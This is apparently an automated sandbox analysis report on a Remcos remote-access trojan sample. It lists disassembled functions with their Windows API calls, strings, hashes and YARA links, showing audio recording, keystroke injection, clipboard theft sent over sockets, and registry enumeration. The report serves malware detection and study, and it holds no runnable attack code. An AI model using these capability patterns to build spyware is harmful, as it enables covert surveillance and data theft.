                                                          • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                          • API String ID: 3809562944-3643129801
                                                          • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                          • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                          • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                          • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                          Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                          • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                          • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                          • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                          • waveInStart.WINMM ref: 00401A81
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: XCG$`=G$x=G
                                                          • API String ID: 1356121797-903574159
                                                          • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                          • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                          • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                          • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                          Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                            • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                            • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                            • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                          • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                          • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                          • TranslateMessage.USER32(?), ref: 0041C9FB
                                                          • DispatchMessageA.USER32(?), ref: 0041CA05
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                          • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                          • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                          • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                          Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                          • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                          • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                          • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                          Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                          • __alloca_probe_16.LIBCMT ref: 00452C91
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                          • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                          • __freea.LIBCMT ref: 00452DAA
                                                          • __freea.LIBCMT ref: 00452DB6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID:
                                                          • API String ID: 201697637-0
                                                          • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                          • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                          • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                          • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                          Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                          • _free.LIBCMT ref: 00444714
                                                          • _free.LIBCMT ref: 0044472D
                                                          • _free.LIBCMT ref: 0044475F
                                                          • _free.LIBCMT ref: 00444768
                                                          • _free.LIBCMT ref: 00444774
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                          • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                          • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                          • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                          Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                          • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                          • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                          • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                          Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ExitThread.KERNEL32 ref: 004017F4
                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                          • __Init_thread_footer.LIBCMT ref: 004017BC
                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: T=G$p[G$>G$>G
                                                          • API String ID: 1596592924-2461731529
                                                          • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                          • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                          • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                          • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                          Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                            • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                            • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                          • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                          • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                          • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                          Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                            • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                            • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                          • _wcslen.LIBCMT ref: 0041A8F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                          • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                          • API String ID: 37874593-703403762
                                                          • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                          • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                          • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                          • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                          Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                          • __alloca_probe_16.LIBCMT ref: 004499E2
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                          • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                          • __freea.LIBCMT ref: 00449B37
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • __freea.LIBCMT ref: 00449B40
                                                          • __freea.LIBCMT ref: 00449B65
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                          • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                          • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                          • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                          Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendInput.USER32 ref: 00418B08
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                            • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • String ID:
                                                          • API String ID: 1167301434-0
                                                          • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                          • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                          • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                          • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                          Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00415A46
                                                          • EmptyClipboard.USER32 ref: 00415A54
                                                          • CloseClipboard.USER32 ref: 00415A5A
                                                          • OpenClipboard.USER32 ref: 00415A61
                                                          • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                          • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                          • CloseClipboard.USER32 ref: 00415A89
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID:
                                                          • API String ID: 2172192267-0
                                                          • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                          • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                          • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                          • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                          Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00447EBC
                                                          • _free.LIBCMT ref: 00447EE0
                                                          • _free.LIBCMT ref: 00448067
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                          • _free.LIBCMT ref: 00448233
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                          • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                          • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                          • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                          Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                          • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                          • Opcode Fuzzy Hash: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                          • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                          Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                          • _free.LIBCMT ref: 00444086
                                                          • _free.LIBCMT ref: 0044409D
                                                          • _free.LIBCMT ref: 004440BC
                                                          • _free.LIBCMT ref: 004440D7
                                                          • _free.LIBCMT ref: 004440EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID: J7D
                                                          • API String ID: 3033488037-1677391033
                                                          • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                          • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                          • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                          • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                          Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                          • __fassign.LIBCMT ref: 0044A180
                                                          • __fassign.LIBCMT ref: 0044A19B
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                          • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                          • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                          • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                          • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                          • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                          Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: HE$HE
                                                          • API String ID: 269201875-1978648262
                                                          • Opcode ID: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                          • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                          • Opcode Fuzzy Hash: 7800a519142f47635a8271b71284b9659b79823d2b8030c83ffac0f9e2146641
                                                          • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                          Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                            • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                            • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                          • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: TUFTUF$>G$DG$DG
                                                          • API String ID: 3114080316-344394840
                                                          • Opcode ID: bf697a078cb867d97e45357ac50b9e71af34c85f47cf55f872e92a0cd902ea26
